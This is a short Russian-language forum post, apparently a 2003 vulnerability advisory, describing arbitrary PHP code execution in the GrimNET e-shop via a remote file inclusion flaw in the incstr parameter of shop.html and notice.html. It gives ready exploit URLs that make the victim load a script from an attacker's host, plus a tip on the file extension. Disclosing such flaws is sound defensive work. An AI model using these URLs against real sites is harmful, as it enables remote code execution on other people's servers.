Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Выполнение произвольного PHP-кода в GrimNET e-shop 20.10.03 22:37
Publisher: dl <Dmitry Leonov>
|
Выполнение произвольного PHP-кода в GrimNET e-shop NivaX nivax@web-hack.ru http://www.web-hack.ru
Не представляю, насколько актуальна эта самая корейская система электронных магазинов [ http://www.grimnet.net/ ], но дырка любопытна и сама по себе.
Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.
Полный текст
|
|
|